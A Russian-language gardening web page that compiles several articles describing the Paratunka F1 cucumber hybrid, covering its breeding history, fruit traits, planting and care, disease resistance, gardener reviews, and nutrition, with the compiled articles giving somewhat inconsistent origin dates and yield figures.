11 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Огурец паратунка описание

Описание сорта огурцов Паратунка

огурец Паратунка f1 – это уникальный раннеспелый сорт, который занимает высокую позицию на мировом рынке. Он появился на рынке не так давно и сразу же заполучил признание всех фермеров и обычных людей. Каким же способом производить его выращивание, чтобы урожайность порадовала и обладает ли сорт неоспоримыми преимуществами?

Описание сорта огурцов Паратунка

Характеристика сорта

Плодовый огурец Паратунка f1 вывели в Голландии в 2005 году. Буквально через несколько месяцев весь мир уже знал об этом сорте. Компания Семко позаботилась о том, чтобы ее детище признали во всем мире и оно получило признание на всех возможных выставках семян или овощей.

Эта разновидность характеризуется тем, что может проявлять свои высокие показатели качества при любых климатических условиях. В Национальном реестре, куда этот вид был внесен в конце 2005 года, указано, что выращивание возможно в любой климатической зоне. Также его можно сажать не только в теплице, но и в открытом грунте.

Огурцы Паратунка f1 относятся к раннеспелым, и гибридным культурам. Они являются партенокарпическими, поэтому не нуждаются в окружающем опылении. Им не нужна помощь пчел и других насекомых для собственного опыления. Описание показывает, что урожайность этой разновидности на самом высоком уровне. Если выращивать этот сорт, что урожай окажется 15 кг с 1м2.

Описание растения

Кусты обладают пучковой характеристикой. Рост растения средней высоты и достигает максимум 1,2 м. На стволе образуются средней плотности листья и ветвления, что существенно упрощает уход и сбор урожая.

Листья имеют темный зеленый оттенок и обладают небольшой шероховатостью. На боковых стеблях наблюдается колючая шершавость. Это позволяет сорту защищаться от насекомых, которые желают поживиться нектаром с желтых цветков.

Описание плода

Каждый плод характеризуется овальной формой. В некоторых случаях встречаются цилиндрические огурчики. На поверхности встречаются небольшие бугры, которые равномерно располагаются по всей площади плода. Длина огурцов не превышает 10 см.

Мякоть довольно мягкая, но не имеет в своей структуре пустые участки. На вкус она довольно сочная и сладкая. Любые показатели горечи отсутствуют. Характерен приятный аромат, который отмечается во всех огурцах. Вес одного плода может быть от 80 до 100 г. Этот сорт универсальный в применении. Подходит как для употребления в сыром виде и приготовления салатов, так и для консервирования или соления. Маринованные корнишоны обладают хрустящей характеристикой, что больше всего привлекает людей в этом виде.

Достоинства

Если рассматривать описание этого сорта, то можно прийти к выводу, что он имеет следующие преимущества над другими разновидностями огурцов:

  • устойчивость к заболеваниям, бактериям и вирусам;
  • универсален в использовании;
  • плоды развиваются в течение одного и того же времени, и имеют одинаковую структуру;
  • раннее созревание плодов;
  • можно выращивать, как в теплице, так и в открытом грунте;
  • высокая характеристика вкуса и товарного вида.

Недостатков в этом виде выявлено не было.

Выращивание сорта

Оберегайте растение от прямых солнечных лучей

Выращивание и посадка семян или рассады происходит только после того, как грунт прогреется до определенной температуры. Она должна составлять не менее 18°С. Ведь это позволит корневой системе не погибнуть, а развиваться с молниеносной скоростью. Посадка семян проводится заранее. Важно помнить, что это следует делать за 30 дней до высадки в открытый грунт.

Высаживание проводится только в легкую почву, которая богата полезными веществами и микроэлементами. Семена не обязательно обрабатывать химическими веществами или прогревать. Они спокойно могут пережить все неприятные факторы окружающей среды. Посадка должна проводиться только в специальных контейнерах. Между лунками расстояние должно составлять около 3 см. Для того, чтобы семена начали прорастать, важна определенная температура и влажность воздуха в теплице. Температура не должна превышать 20°С, а вот влажность устанавливается умеренная. Это делается для того, чтобы семена не сгорели или не покрылись прелостью.

В грунт высаживается только рассада, которая имеет 2-3 полноценный листа. Между рядами устанавливается расстояние в 50 см, а между лунками оно должно составлять 28 см. Если вы будете выращивать урожай на открытых участках, то нужно побеспокоиться о том, чтобы на огурцы попадало как можно меньше солнечных лучей, ведь они могут забирать влагу и не давать растению полноценно развиваться.

Правила ухода

Паратунка не требует к себе особого ухода. Однако, если вы будете следовать всем его правилам, то сможете увеличить количество урожая минимум в 2 раза. Важно отметить тот факт, что Паратунка очень любит большое количество воды. По этой причине полив должен проводиться сразу же после высыхания почвы. Но, следует контролировать количество воды, ведь обильное ее количество может привести к гниению корней. Полив проводится только в вечернее время суток и только теплой водой.

Для того, чтобы урожай приумножался, не стоит забывать об прищепке боковых побегов и удалении первых нескольких завязей. Растение не должно превышать высоту жгута, к которому оно привязано, поэтому нужно прищеплять верхние побеги для замедления их роста. Подкормка должна проводиться не 1 раз, а как минимум 4.

Профилактика

Селекционеры позаботились о том, чтобы этот вид огурцов не подвергался насекомым и другим вредителям. Также на него не влияют грибковые и вирусные инфекции, а также бактерии, которые могут находиться в почве или воздухе. Но, специалисты рекомендуют не забывать о профилактических мерах. Это позволит ускорить процесс созревания отличных плодов, с высокими показателями товарного качества.

В качестве профилактики можно использовать рецепты народной медицины (раствор марганцовки, бордосская жидкость или чесночная настойка) или специализированные химические вещества. Покупать нужно только проверенные продукты, ведь от их качества зависит дальнейшее количество продаваемых и употребляемых плодов. Проводить дезинфекцию требуется за 3 дня до выставления полива. Это позволит всем нужным веществам впитаться внутрь стебля, а излишки будут удалены с помощью воды.

Огурец Паратунка: описание и отзывы

Люди научились выращивать огурцы с глубокой древности и, надо сказать, преуспели в этом вопросе. Сегодня сложно найти садовый или дачный участок, на котором нет хотя бы маленькой грядки с этими овощами.

В нашей стране эту культуру выращивают повсеместно. С каждым годом появляются все новые и более совершенные сорта, сочетающие в себе возможность выращивания не только в закрытом, но и в открытом, незащищенном грунте. Одним из них является сорт огурцов Паратунка, о котором мы сегодня и поговорим.

История сорта

В агрофирме «Семко-Юниор» селекционеры задумались о создании сорта, который бы отвечал требованиям мягкого морского, сурового континентального и северного климата. Огурцы нового сорта должны были давать богатый урожай в теплице в любое время года и рано высеваться в открытый грунт.

Научному сотруднику фирмы Ю. Б. Алексееву удалось воплотить мечту в жизнь. Он вывел такой сорт в 2006 году и назвал «Паратунка». За основу был взят известный сорт Парус с высокой урожайностью и отличной всхожестью. После внесения в Государственный реестр семян РФ история Паратунки стала стремительно развиваться. Его выращивают в шести регионах: Центральном, Северо-Кавказском, Северном, Волго-Вятском, Северо-Западном, Средневолжском.

Для россиян семена огурца Паратунка возможно выращивать и в других регионах, в качестве экспериментального сорта. Он предназначен для разведения в теплицах, но показывает неплохие результаты и в открытом грунте.

Сорт огурцов Паратунка: описание

Эти огурцы имеют слабую корневую систему, располагающуюся очень близко от поверхности или углубляющуюся в почву максимум на двадцать сантиметров. Самым верхним корешкам всегда недостает влаги, особенно в период плодоношения.

Огурцы Паратунка, описание которых можно найти во многих изданиях по овощеводству, имеют довольно длинные, ветвистые стебли. Если их правильно формировать, то они вырастают до двух метров.

У основания листа, в междоузлиях, формируются побеги первого порядка. В дальнейшем они дают жизнь следующим ветвям.

Растение успешно развивается на шпалере. Если ветвь этого огурца ложится на землю, она очень быстро укореняется. На эту особенность обратили внимание огородники и стали специально прикапывать побеги, создавая таким образом мощную корневую систему. От нее зависит урожайность растения.

В пазухах появляются один или несколько цветочков, соответственно, и завязей столько же. Обычно их бывает от двух до четырех штук. Цветки в основном женского типа. А листья огурца Паратунка окрашены в насыщенный зеленый цвет.

Этому сорту не требуется дополнительное опыление. Отсутствие пчел нисколько не снижает количества завязей. От первых всходов до сбора урожая проходит около пятидесяти дней. Свежими огурцами можно лакомиться до первых заморозков.

Плоды

Огурцы Паратунка, фото которых мы разместили в этой статье, имеют цилиндрическую форму, с небольшим количеством бугорков, а ребер практически не видно. На темно-зеленой кожице можно увидеть белые полосы, которые занимают третью часть плода.

Мякоть огурца Паратунка плотная, не имеющая пустот и горечи, с приятным вкусом, ароматная и очень сочная. Плоды — средние и мелкие, вполне подходят для корнишонного маринования. Их средний вес колеблется от 70 до 95 граммов.

Урожайность

Прекрасные вкусовые качества и высокая урожайность сделали этот сорт фаворитом среди огуречных селекционных новинок. С одного квадратного метра овощеводы собирают до четырнадцати килограммов вкусных и ароматных огурцов, длиной до десяти сантиметров.

Огурец Паратунка, судя по отзывам, является универсальным: он хорош как в свежем виде, так и в консервированном. Он хорошо переносит небольшие колебания температур, а это, согласитесь, важная характеристика сорта.

Способы выращивания

Выращивать огурцы Паратунка можно двумя способами: сеять семенами в грунт или высаживать рассаду. Первый способ предполагает посев семян в открытый грунт после того, как почва прогреется до +15 °C, а воздух до +22 °C.

Огурцы Паратунка, выращенные рассадным способом, судя по отзывам, показывают лучшие результаты. Для рассады семена сеют примерно за месяц до пересадки растений в открытый грунт. Почва должна быть питательной, легкой, в меру увлажненной, обеззараженной и хорошо прогретой. Семена этого сорта не нуждаются в предварительном прогреве и обеззараживании, но замачивание поможет улучшить всхожесть.

Сеют их в специальные кассетные контейнеры, в которых они заглубляются на 1,5-2 сантиметра. Для проращивания этой культуры требуется постоянное тепло и довольно высокая влажность. После появления первых всходов, для получения крепкой, не вытянувшейся рассады, необходимо снизить температуру в помещении и обеспечить сеянцы дополнительным освещением.

Если вы используете готовый высококачественный посадочный грунт для выращивания овощных культур, то до высаживания рассады на постоянное место, внесение удобрений не требуется. Перед высаживанием в грунт растения следует закалить: выносить их на улицу вначале на пятнадцать минут. С каждым днем время «прогулок» увеличивают. Кроме того, необходимо хорошо увлажнить земляной ком, чтобы облегчить пересаживание.

Посадка в грунт

При пересаживании саженцев в грунт можно использовать как гнездовой, так и рядовой способ. В первом случае предполагается схема 50 х 30 см либо шахматный порядок. Если вы будете высаживать растения рядами, то расстояние между ними должно быть не менее 15 см, а между рядами промежуток — около 70 см.

Огурцы Паратунка нетребовательны, но очень отзывчивы на своевременный и грамотный уход. Это влаголюбивая культура, которая нуждается в орошении по мере просыхания грунта. При этом нельзя допускать переувлажнения, во избежание загнивания корней. Огурцы этого сорта желательно поливать вечером теплой водой. После полива почву следует разрыхлить, но не слишком глубоко.

Растение нуждается в подкормках. Для этого используют специальные составы либо навозную жижу. Небольшие огурчики надо собирать через сутки по утрам. Сбор должен быть активным и своевременным — это повысит урожайность. Еще одним способом повышения урожайности опытные овощеводы считают удаление первых четырех завязей и прищипывание двух нижних боковых побегов. Старайтесь не допускать смыкания растений выше уровня шпалеры.

Выращивая этот сорт в открытом грунте, не стоит заниматься его формированием, а в теплицах необходимо использовать шпалеры и подвязывать к ним ветви. Подкармливают огурцы четыре раза в сезон, используя минеральные и органические удобрения, которые следует чередовать.

Огурцы Паратунка: отзывы овощеводов

Об этом сорте положительно отзываются как владельцы теплиц и парников, так и садоводы, которые выращивают огурцы только в открытом грунте. Великолепные вкусовые качества не исчезают в мариновании и засолке. После консервации огурчики остаются хрустящими и ароматными. Сорт Паратунка нравится овощеводам ранним и обильным плодоношением. За ним несложно ухаживать, а при выращивании в теплице можно радовать семью свежими огурчиками в течение всего года.

Огурец Паратунка

В последние несколько лет многие дачники выбирают огурец Паратунка, хотя существует много сортов. Этот овощ подходит для выращивания на открытом грунте и в условиях теплицы. Чтобы получить максимальный урожай важно знать особенности ухода и формирования кустов.

История селекции сорта

Сорт огурцов Паратунка f1 появился более 11 лет назад и уже смог завоевать популярность среди огородников. Семена этого гибрида производит компания «Семко-Юниор». Вывел этот сорт Ю.Б. Алексеев, а за основу взял известный своим обильным урожаем и хорошей всхожестью огурец Парус. Этот гибрид внесли в Госреестр семян России. Сегодня активно продолжаются работы по выведению сорта, который будет максимально устойчив к различным болезням. Огородники выбирают огурец Паратунка ф1 за высокую плодовитость.

Описание огурцов Паратунка f1

У данного сорта, как и у других огурцов, корни слабо развиты. Их основная часть располагается в верхнем слое грунта, только небольшое количество уходит на глубину 20 см. Корешкам в верхнем слое всегда не хватает влаги, особенно в момент плодоношения.

Стебель у этого овоща ветвистый и длинный. При правильном формировании и достаточной высоты шпалеры он может достигать 2 м в длину. В междоузльях происходит формирование ветвей первого порядка, которые провоцируют рост следующим отросткам. Растение прекрасно развивается на шпалере.

Если ветвь достигает земли, то сразу пускает корни. Эта особенность помогает огородникам укрепить корневую систему, поэтому они специально прикапывают их. Именно от правильного развития корней зависит урожайность. В пазухах может быть до 4 цветков, в основном они женского типа. Завязей – тоже 4.

Описание плодов

Согласно описанию, огурцы Паратунка имеют цилиндрическую форму с темно-зелеными полосками средней длины. Масса каждого огурца имеет вес около 100 г. Вкус приятный, без малейшей горечи.

Характеристики огурцов Паратунка

Огурец Паратунка относится к индетерминатному типу, который отличается тем, что цветочный побег может вырасти в длину до 3 метров. Ветвистость развита не сильно. Гибрид рано спеет и приносит первые плоды уже на 40 день после посадки. Плодоносит почти до первых морозов. Опыляется огурец Паратунка самостоятельно. Подобное качество позволяет выращивать этот сорт в закрытом грунте.

Урожайность и плодоношение

Сорт огурцов Паратунка не требует особых навыков ухода. Первые сборы можно проводить на 35−45 день.

В средней полосе России семена огурца Паратунка для выращивания рассады закладываются в таблетки из торфа. Рекомендуемое время – в начале мая, когда теплая погода уже установится. К концу весны или в первых числах лета молодые огурцы с 3−4 листьями перемещают в грунт. Если планируется осуществлять посадку в открытый грунт сразу, то лучше делать это в последние дни весны.

Согласно отзывам, урожайность семян огурцов Паратунка с 1 кв. м составляет при правильном уходе примерно можно 15 кг.

Область применения

Гибридный огурец Паратунка спеет очень рано, отличается высокой урожайностью. Подходит для употребления в пищу в свежем, соленом или маринованном виде. Отличается приятным вкусом, поэтому часто используется для приготовления салатов.

Устойчивость к болезням и вредителям

Семена огурцов Паратунка устойчивы ко многим заболеваниям, даже если растут не в благоприятных условиях. Если опрыскать растение специальными препаратами, то можно быть уверенным, что весь урожай останется в сохранности. Во время посева дополнительно обеззараживать семена не нужно, так как их уже производитель обработал фунгицидами.

Огурцам Паратунка могут грозить такие заболевания и вредители:

  • корневая и белая гниль;
  • антракноз;
  • пероноспороз;
  • тля;
  • паутинный клещ.

Если на кусте огурца Паратунка обнаружены признаки болезни или вредители, то его необходимо сразу же убрать, а оставшиеся обработать. Своевременно проведенная профилактика поможет сберечь урожай. Она включает в себя такие мероприятия:

  • огурцы нужно сажать как можно реже;
  • контролировать влажность грунта – она должна быть умеренной;
  • кусты осматривать ежедневно, чтобы своевременно выявить болезни и вредителей;
  • регулярно бороться с сорняками;
  • рыхлить почву;
  • обеззаразить участок перед посевом семян и посадкой.

Если следовать всем рекомендациям, то можно получить хороший урожай, которому не будут страшны болезни и вредители.

Достоинства и недостатки сорта

Огурец Паратунка обладает рядом преимуществ перед другими сортами:

  • зеленые листья небольшого размера отлично пропускают свет и влагу;
  • сорт самоопыляется;
  • высокая скорость поспевания плодов – уже через 35−45 дней можно начать сбор первого урожая;
  • продолжительный срок плодоношения;
  • приятный вкус плодов, без горечи;
  • высокая резистентность ко многим заболеваниям;
  • универсальность – подходит для засола, приготовления закуски или употребления в свежем виде.

У огурца Паратунка есть и свои минусы:

  • слабая корневая система – если она не будет правильно развиваться, то растению будет не хватать влаги;
  • необходимость активного и обильного полива;
  • требует наличия дополнительных приспособлений для правильного формирования куста.

Но благодаря высокой урожайности и приятным вкусовым качествам, минусы не так значительны.

Особенности посадки и ухода

Этот сорт подходит для выращивания в закрытом грунте: в теплицах или парниках. Именно поэтому дачники огурец Паратунка выращивают вертикально, на видео представлено, как правильно это делать.

Схема посадки 30х50 см или до 4 кустов на 1 кв. м. Выращивать огурцы Паратунка можно рассадным и безрассадным способом.

Благодаря тому, что данный сорт может самостоятельно опыляться, из каждого цветка получается хорошо сформированный огурец при отсутствии пчел. Насекомые в теплице никаким образом не повлияют на урожайность и внешней вид плодов.

Сорт Паратунка считается неприхотливым, но минимальный уход ему все же требуется:

  1. Полив. Орошать растения необходимо теплой водой через каждые 3−5 дня. В жаркую погоду – ежедневно. Обязательно следует контролировать, чтобы почва была увлажнена на глубину не менее 20 см.
  2. Прополка и рыхление. Чтобы к корням этого сорта огурца поступало как можно больше воздуха, нужно периодически взрыхлять почву. Лучше совмещать сразу два процесса. За период вегетации должно быть проведено около 6 обработок.
  3. Подкормка. Огурцы сорта Паратунка активно поглощают питательные вещества из почвы. Поэтому с момента посадки и окончания периода плодоношения должно быть проведено до 4 прикормок. Первый раз ее вносят в период формирования первых двух листочков. Для питания готовят такую смесь: по 15 г мочевины и сульфата калия, 50 г суперфосфата. Можно использовать коровяк или птичий помет. Второй раз питание вносят в момент начала плодоношения в виде азотно-калийного удобрения. Третий раз подкармливают в середине лета.

Посадка на рассаду

Изначально сорт выводился для выращивания в тепличных условиях, но после перемещения в открытый грунт также показывает неплохие результаты. Особенно если выносить на грядки уже готовую рассаду. Окрепшие кусты хорошо переносят холод и плодоносят до первых заморозков.

В середине весны сеют предварительно замоченные и проросшие семена огурцов Паратунки. Отзывы дачников указывают, что лучше будет посадку осуществить в одноразовые стаканы из пластика с добавлением торфа. Объем их должен быть не менее 500 мл. Чтобы семена быстрее взошли, следует правильно подобрать почву. Она должна быть легкой и питательной. Подойдет торф, перегной или опилки перепревшие, смешанные с землей из сада в соотношении 1:1. Рекомендуется также добавить немного золы.

Огурцы Паратунка быстро дают всходы в теплых и влажных условиях. Оптимальная температура – 25 °C. После того как ростки появятся из земли, условия должны измениться. Подходящая температура для этого этапа составляет 20 °C. В таких условиях корни равномерно развиваются, а ростки не вытягиваются чрезмерно.

Рассаду в грунт высаживают после того, как появится 4 лист. Обычно это происходит спустя 20 дней после посева семян.

Выращивание огурцов безрассадным методом

Можно сеять семена огурцов непосредственно в открытый грунт. Лучшее время для этого – первая неделя мая. Пророщенные или сухие семена огурца Паратунка высеют с шагом 50 на 30 см.

Если сажать грядками, то между кустами должно быть расстояние около 25 см, а между рядами – до 70. На 1 кв. м должно быть не более 4 растений. Семена сорта высевают на глубину не более 2 см, присыпают грунтом и прикрывают пленкой. На открытой местности всходы появляются на 2 недели позже, чем в помещении. Температура почвы и воздуха должна быть ниже.

Последующий уход за огурцами

Гибрид Паратунка – неприхотливое растение, но он не даст хорошего урожая, если не обеспечить надлежащий уход:

  • огурцы − это влаголюбивое растение, поэтому ирригацию осуществляют по мере высыхания почвы, но при этом переувлажнения следует избегать;
  • полив сорта лучше проводить в вечернее время и теплой водой;
  • чтобы защитить растение от вредителей и болезней, необходимо проводить обработку специальными химическими препаратами;
  • для повышения урожайности первые 4 завязи рекомендуется убирать и 2 нижних боковых побегов;
  • нельзя допускать роста растений выше решетки;
  • во время выращивания огурцов Паратунка в открытом грунте формирование кустов не требуется, а в теплицах рекомендовано использовать решетки;
  • регулярные подкормки питательными веществами, не менее 4 раз за сезон.

Постоянный сбор огурцов помогает увеличить урожайность. Нездоровые побеги и больные листья сразу же удаляются.

Формирование куста

Способ выращивания огурца Паратунка влияет на формирование куста:

  1. Шпалерный метод. Если используется этот способ для выращивания овоща, то до 5 листа нужно удалять все побеги и цветы, точку роста обязательно прищипнуть. Такие мероприятия помогают обеспечить хорошую вентиляцию, а сами кусты быстро окрепнут до того, как начнут плодоносить. Первые 2 побега, которые располагаются после 2-го листа, нужно прищипывать. После того как ветви достигнут шпалеры – их подрезают.
  2. Метод выращивания без использования опоры. Кроме того, что обязательно прищипывают, нижние ветки прикапывают, чтобы укрепить корневую систему. Кусты также нужно мульчировать опилками или торфом. Основание стебля следует присыпать повыше, чтобы предотвратить оголение корня.
  3. Обновление куста огурец Паратунка переносит легко. Все нездоровые листья и ветки, которые уже не плодоносят, обрезают острым ножом или секатором. Точки роста пасынков прищипывают. После таких манипуляций растение даст новые побеги и завязи.

Заключение

Огурец Паратунка − это неприхотливое растение, которое при надлежащем уходе может дать хороший урожай. Этот сорт имеет приятный вкус, поэтому любим многими дачниками. Его можно солить и консервировать.

Огурец «Паратунка F1»: описание гибридного сорта, фото и отзывы

Сорт огурцов «Паратунка F1» российского происхождения, зарегистрирован в Госреестре в 2006 году оригинатором – агрофирмой «Семко-Юниор» (г. Москва). Рекомендуется для выращивания в личных подсобных хозяйствах под пленочными укрытиями в большинстве регионов России: Северном, Северо-Западном, Центральном, Волго-Вятском, Центрально-Черноземном, Северо-Кавказском и Средневолжском.

Агрофирма «Партнер» с 2014 года предлагает дачникам и огородникам семена высокого качества. Компания производит семена собственной селекции. Вся продукция соответствует актуальным ГОСТам Российской Федерации, семена производятся экологически чистым путем без использования ГМО. Каждый новый сорт тестируется на собственной опытной базе, в продажу поступают только лучшие образцы, проверенные селекционерами и экспертами компании.
Телефон: +7 (499) 677-62-42
Email: Этот адрес электронной почты защищён от спам-ботов. У вас должен быть включен JavaScript для просмотра.

Приобрести семена огурца Паратунка F1 в розницу.
Официальный интернет-магазин семян «Партнер».

Данный гибрид можно назвать преемником лучших селекционных достижений советского периода, так как он был выведен на основе более раннего и хорошо зарекомендовавшего себя «Парус F1». Работы по усовершенствованию гибридного сорта огурцов «Паратунка F1» продолжаются до сих пор, и их результаты отмечают многие огородники.

Основные характеристики

К числу достоинств гибрида относят:

Характеристика Показатели
Ранняя спелость Плодоношение начинается в среднем с 42-го дня (40-43) после полных всходов
Урожайность Изначально было заявлено 12,7 кг/м 2 , сейчас – свыше 22 кг/м 2 (в условиях защищенного грунта)
Универсальность Отличные вкусовые качества плодов в свежем виде и при консервировании
Товарность продукции Зеленцы короткие (корнишонного типа), пропорциональные, среднебугорчатые, белошипые
Выносливость Хорошо адаптирован к переменчивым климатическим условиям (перепадам температур)
Устойчивость к болезням Был заявлен как неподверженный оливковой пятнистости (кладоспориозу) и мучнистой росе. Позже дополнен устойчивостью к вирусу обыкновенной огуречной мозаики и толерантностью к бактериозу

Описание

Гибрид огурцов «Паратунка F1» – партенокарпический, то есть завязи развиваются без оплодотворения и не нуждаются в опылении насекомыми.

У партенокарпиков плодоношение более дружное и равномерное, чем у пчелоопыляемых огурцов, так как зависит в основном от правильной агротехники, а не от внешних факторов (погодных условий, количества и активности насекомых). Высокую урожайность гибрида наряду с устойчивой партенокарпией обеспечивают:

  • женский тип цветения (все цветы имеют завязь, пустоцвет отсутствует);
  • склонность к пучковому заложению завязей (по 2-3 и более в узле).

Растение довольно компактное, индетерминантное (неограниченное в росте), среднерослое (до 2 м) и умеренно ветвистое, с небольшими листьями.

Рекомендуемая густота посадки – не более 3 растений на 1 м 2 .

Гибрид отличается ранними сроками созревания (вступает в плодоношение с 40-43-го дня после появления полных всходов), равномерным и длительным плодоношением до самых заморозков. Благодаря высокой урожайности (более 22 кг/м 2 в защищенном грунте), товарному внешнему виду и отличным вкусовым качествам зеленцов «Паратунка F1» считается одним из универсальных гибридов, подходящих для коммерческого выращивания в весенне-летнем и летне-осеннем оборотах.

Зеленцы корнишонного типа: короткие (8-10 см в длину, 2-3,5 см в диаметре), массой 75-100 г, слаборебристые. Имеют цилиндрическую форму с короткой шейкой и темно-зеленую окраску со светлыми полосами до 1/3-1/2 длины. Кожура тонкая, покрытая бугорками и небольшим количеством белых колючих шипов, семена мелкие и нежные.

Вкус свежих плодов отличный, без горечи, мякоть плотная и хрустящая, без пустот. Зеленцы универсального назначения: подходят для употребления в свежем виде (салатные), но особенно хороши для маринования (консервные).

Недостатками гибридных огурцов считают невозможность сбора собственных семян и дороговизну покупного семенного материала. Но эти минусы незначительны по сравнению с бесспорными плюсами. У гибрида «Паратунка F1» кроме уже перечисленных (ранней спелости, высокой урожайности, универсальности зеленцов) также необходимо отметить:

  • неприхотливость в уходе;
  • выносливость к температурным стрессам;
  • комплексную устойчивость к целому ряду заболеваний: мучнистой росе, оливковой пятнистости (кладоспориозу), вирусу обыкновенной огуречной мозаики (ВОМ 1), а также толерантность к бактериозу.

Отзывы

Наталья, 32 года, г. Тверь

Не так давно открыла для себя отличный сорт огурцов Паратунка Ф1. Сажали их рассадой в открытый грунт в начале июня, на первых порах укрывали пленкой. Огурчики пошли очень дружно с середины июля, плодоносили активно и ровно до сентября месяца. Ухаживать нам за огородом особо некогда, стараемся выбираться хотя бы через день, чтобы полить и собрать урожай. Эти огурцы понравились тем, что они не разрастаются в огромные желтяки, а остаются на кустах небольшими и зелеными, даже если их просмотрели и не сорвали вовремя. По вкусовым качествам – прекрасные: сладенькие с нежной кожицей и мелкими семенами. Приятно хрустят и остаются плотными при консервации.

Раиса, 54 года, г. Арамиль (Свердловская обл.)

У нас в теплице из поликарбоната хорошо плодоносят самоопыляемые огурцы (или партенокарпики) с букетными завязями. Раньше высаживали в основном голландские (Артист, Директор, Герман), но семена очень дорогие, наши получаются дешевле, а по урожайности и вкусу даже лучше. Сейчас обязательно покупаем Паратунку и Сибирскую гирлянду. За сезон получается не меньше 15 кг огурцов с метра площади. Выращиваем на шпалере, пасынкуем нижние боковые побеги и обрезаем усики. Подкормки делаем органические каждые 10-14 дней. Паратунка мне больше нравится в салатах, а для консервации я предпочитаю зеленцы помельче.

Станислав, 41 год, г. Тихвин (Ленинградская обл.)

В прошлом году пробовал посадить огурцы Паратунка F1. Слышал много хвалебных отзывов, вроде бы устойчивые и выносливые, но у нас большая часть кустов погибла от какой-то прикорневой гнили. Может семена попались некачественные или были посажены слишком густо.

Видео

Опытом выращивания гибридного сорта делится юный огородник в следующем видео:

Несколько лет работала в качестве редактора телевизионной программы с ведущими производителями декоративных растений в Украине. На даче из всех видов аграрных работ предпочитает сбор урожая, но ради этого готова регулярно полоть, тяпать, пасынковать, поливать, подвязывать, прореживать и т. д. Убеждена, что самые вкусные овощи и фрукты – выращенные своими руками!

Нашли ошибку? Выделите текст мышкой и нажмите:

От сортовых помидоров можно получить «свои» семена для посева на следующий год (если сорт очень понравился). А с гибридными это делать бесполезно: семена-то получатся, но они будут нести наследственный материал не того растения, с которого взяты, а его многочисленных «предков».

В помощь садоводам и огородникам разработаны удобные приложения для Android. В первую очередь это посевные (лунные, цветочные и т. д.) календари, тематические журналы, подборки полезных советов. С их помощью можно выбрать день, благоприятный для посадки каждого вида растений, определить сроки их созревания и вовремя собрать урожай.

Новинка американских разработчиков – робот Tertill, выполняющий прополку сорняков в огороде. Прибор придуман под руководством Джона Доунза (создателя робота-пылесоса) и работает при любых погодных условиях автономно, передвигаясь по неровной поверхности на колесах. При этом он срезает все растения ниже 3 см встроенным триммером.

В маленькой Дании любой участок земли – очень дорогое удовольствие. Поэтому местные садоводы-огородники приспособились выращивать свежие овощи в ведрах, больших пакетах, пенопластовых ящиках, наполненных специальной земляной смесью. Такие агротехнические методы позволяют получать урожай даже в домашних условиях.

В Австралии ученые начали эксперименты по клонированию нескольких сортов винограда, произрастающих в холодных регионах. Потепление климата, которое прогнозируют на ближайшие 50 лет, приведет к их исчезновению. Австралийские сорта имеют отличные характеристики для виноделия и не подвержены распространенным в Европе и Америке заболеваниям.

И перегной, и компост по праву являются основой органического земледелия. Их присутствие в почве значительно увеличивает урожай и улучшает вкусовые качества овощей и фруктов. По свойствам и внешнему виду они очень похожи, но путать их не стоит. Перегной – перепревший навоз или птичий помет. Компост – перепревшие органические остатки самого разного происхождения (испортившаяся пища с кухни, ботва, сорняки, тонкие веточки). Перегной считается более качественным удобрением, компост более доступен.

Перегной – перепревший навоз или птичий помет. Готовят его так: навоз складывают в кучу или бурт, переслаивая его опилками, торфом и огородной землей. Бурт накрывают пленкой, чтобы стабилизировать температуру и влажность (это нужно для повышения активности микроорганизмов). Удобрение «созревает» в течение 2-5 лет – в зависимости от внешних условий и состава исходного сырья. На выходе получается рыхлая однородная масса с приятным запахом свежей земли.

Считается, что некоторые овощи и фрукты (огурцы, стеблевой сельдерей, все разновидности капусты, перец, яблоки) обладают «отрицательной калорийностью», то есть при переваривании затрачивается больше калорий, чем в них содержится. На самом деле в пищеварительном процессе расходуется только 10-20% калорий, полученных с едой.

Компост – перепревшие органические остатки самого разного происхождения. Как сделать? В кучу, яму или большой ящик складывают все подряд: кухонные остатки, ботву огородных культур, скошенные до цветения сорняки, тонкие веточки. Все это переслаивают фосфоритной мукой, иногда соломой, землей или торфом. (Некоторые дачники добавляют специальные ускорители компостирования.) Накрывают пленкой. В процессе перепревания кучу периодически ворошат или протыкают для притока свежего воздуха. Обычно компост «зреет» 2 года, но с современными добавками может быть готов и за один летний сезон.

Гибридные огурцы «Паратунка» с отличной всхожестью и богатым урожаем

Сложно представить салат без огурцов, особенно в летнее время. Практически все мы употребляем их в том или ином виде, маринуем, консервируем, угощаем родных и знакомых, выращиваем на продажу. Еще в далекой древности Христофор Колумб добавлял в рацион моряков огурцы, чтобы защитить их от цинги, а знаменитая египетская царица Клеопатра говорила, что обязана именно им своей красотой.

Огурец популярен не только в кулинарии — он также занимает ведущее место в селекционной работе. С его участием постоянно создаются новые сорта и гибриды. Преимущество последних в том, что они совмещают лучшие качества, взятые от родительских сортов. Один из таких гибридов – Паратунка F1, который уже несколько лет входит в число лидеров по продажам. Познакомимся с ним поближе.

Описание огурцов

Гибрид Паратунка F1 был создан в 2006 году на основе популярного сорта Парус, поставляется российской фирмой «Семко-юниор». Отличается хорошей урожайностью и не особенно требователен к условиям выращивания.

Отличительные черты

Гибрид подходит для культивирования на дачных участках и для промышленного производства на фермерских огуречных плантациях.

Паратунка дает большой урожай при выращивании и на шпалерах, и на земле. Причем на почве плети быстро начинают укореняться. Эту отличительную особенность овощеводы давно заметили и используют для укрепления корневой системы растения, которая у огурцов, особенно гибридных, традиционно слаба и подвержена болезням.

Состав и свойства

Как и большинство своих собратьев, огурец Паратунка состоит на 95% из воды. Плод почти не имеет пустот, в нем мало семян.

Пищевая ценность продукта (на 100 г):

  • калорийность — 14 ккал;
  • белков – 0,8 г;
  • жиров – 0,1 г;
  • углеводов – 2,5 г;
  • органические кислоты – 0,1 г;
  • клетчатка – 1 г;
  • гликемический индекс – 25.

Помимо этого, культура богата витаминами С и К, групп А и В. Плод содержит такие минералы, как железо, медь, марганец и многие другие. В огурцах содержится также йод, предотвращающий заболевания щитовидной железы.

Регулярное употребление свежих огурцов в пищу может помочь вывести из почек мелкие камни и песок, улучшает перистальтику кишечника. Но овощ противопоказано включать в рацион, если конкременты в почках и желчных протоках крупные.

Употребление плодов ускоряет выведение жидкости из организма, что понижает давление, поэтому гипотоникам следует с осторожностью употреблять огурцы.

Характеристики гибрида Паратунка

Растение среднерослое, средней кустистости. При хорошем уходе кусты могут вытягиваться в длину до 3 м.

